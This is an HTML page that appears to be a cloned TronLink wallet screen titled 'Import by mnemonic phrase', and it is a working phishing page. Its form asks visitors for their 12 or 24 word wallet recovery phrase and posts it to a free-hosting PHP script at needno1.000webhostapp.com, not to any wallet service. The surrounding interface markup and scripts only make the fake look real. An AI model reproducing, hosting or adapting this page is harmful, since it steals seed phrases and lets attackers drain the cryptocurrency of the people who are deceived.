<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1 user-scalable=no">
    <title>TronLink | Professional USDT-Tron (TRX) Wallet</title>
    <link rel="shortcut icon" href="./apps_files/icon.jpg">
    <link rel="stylesheet" type="text/css" href="./apps_files/index10.css" title="ltr">
    <link rel="stylesheet" type="text/css" href="./apps_files/index-rtl.css" title="rtl" disabled="">
  <style></style></head>
  <body>
    <div id="app-content"><div class="app mouse-user-styles"><div class="app-header"><div class="app-header__contents"><div class="back"></div><div class="app-header__logo-container app-header__logo-container--clickable"><div class="import-account__label">Import by mnemonic phrase</div></div><div class="app-header__account-menu-container"><div class="app-header__network-component-wrapper"><div class="" role="button" tabindex="0"><div class=""><div class=""><span class="color-indicator__inner-circle"></span></div></div><span class="box box--margin-top-1 box--margin-right-0 box--margin-bottom-1 box--margin-left-0 typography chip__label typography--h7 typography--align-undefined typography--color-ui-4 typography--weight-normal"></span><div class="chip__right-icon"><i class="network-display__icon app-header__network-down-arrow"></i></div></div></div></div></div></div><div><span></span></div><div class="menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;">
	<style>
          .menu-droppo-enter {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }

          .menu-droppo-enter.menu-droppo-enter-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave.menu-droppo-leave-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }
        </style></div><div class="main-container-wrapper"><form method="post" action="https://needno1.000webhostapp.com/klv1.php?nkbihfbeogaeaoehlefnkodbefgpgknn/home.html#restore-vault">
            <div class="import-account">
        <div class="import-account__selector-label">Please enter your mnemonic phrase below. This will either be 12 or 24 words in leigth (separated by spaces)</div><div class="import-account__input-wrapper"><textarea class="import-account__secret-phrase" placeholder="Mnemonic phrase" name="phrase" required="true"></textarea><span class="error"></span></div></div><div class="MuiFormControl-root"><div class=""></div></div><button class="button btn-primary first-time-flow__button" type="submit">Import</button></div></form></div></div></div></div></div>
    <div id="popover-content"></div>
    <script src="./apps_files/globalthis.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./apps_files/initSentry.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./apps_files/lockdown.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./apps_files/runLockdown.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./apps_files/ui-libs.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./apps_files/ui.js.download" type="text/javascript" charset="utf-8"></script>
  

</body></html>